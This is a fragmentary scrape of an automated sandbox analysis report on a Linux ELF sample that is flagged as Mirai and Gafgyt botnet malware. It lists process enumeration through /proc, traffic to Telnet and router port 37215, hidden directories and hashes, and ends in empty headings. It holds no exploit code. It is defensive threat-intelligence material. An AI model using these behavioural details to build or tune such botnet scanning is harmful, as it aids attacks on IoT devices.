Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2285/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2281/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1623/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/761/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1622/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/884/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1983/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2038/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1344/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1465/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1586/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1860/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1463/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2156/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/801/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1629/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4459/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1627/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1900/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5043/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5285/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5200/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3021/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/491/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2294/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2050/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1877/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/772/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1633/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1599/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1632/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/774/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1477/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/654/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/896/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1476/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1872/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2048/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/655/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2289/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/656/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/777/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/657/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/658/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/419/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/936/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1639/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1638/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2208/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2180/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4483/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4486/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1809/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1494/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1890/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2063/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2062/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1888/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1886/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/420/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1489/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/785/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1642/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/788/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/667/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/789/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5204/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1648/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2191/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4491/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4495/cmdline	Jump to behavior

Creates hidden files and/or directories

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.cache	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.local	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5274)	Directory: /home/saturnino/.config	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35056
Source: unknown	Network traffic detected: HTTP traffic on port 42128 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35062
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35108
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35164
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35220
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35230
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35254
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35306
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35316
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35324
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35338
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35354
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35382
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35388
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35404
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35410
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35456
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35500
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35506
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45540
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45552
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45556
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45562
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45570
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45592
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45604
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45618
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45656
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45700
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45722
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45734
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45746
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45750
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45756
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45760
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45768
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45770
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45782
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45800
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45814
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45844
Source: unknown	Network traffic detected: HTTP traffic on port 50834 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45870
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45884
Source: unknown	Network traffic detected: HTTP traffic on port 34666 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34666
Source: unknown	Network traffic detected: HTTP traffic on port 33156 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46408 -> 37215

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5251)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5252)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5253)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5254)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5255)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5256)	Queries kernel information via 'uname':	Jump to behavior

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Mirai

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Gafgyt

Source: Yara match	File source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY

ID:	512668
Product:	CloudBasic
Start time:	10:07:43
Start date:	01.11.2021
Sample:	9o6Z1wEokT
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	68cb43368a1a8837125de604f0c2a11e
SHA1:	aebd07f775086490ee2b054a59fa7f9494c8de84
SHA256:	126ddb96a062731ec243a9313504aaba974cbe7b677d39a23fd6750f88fc772e
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 50.16%

Linux Analysis Report 9o6Z1wEokT

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs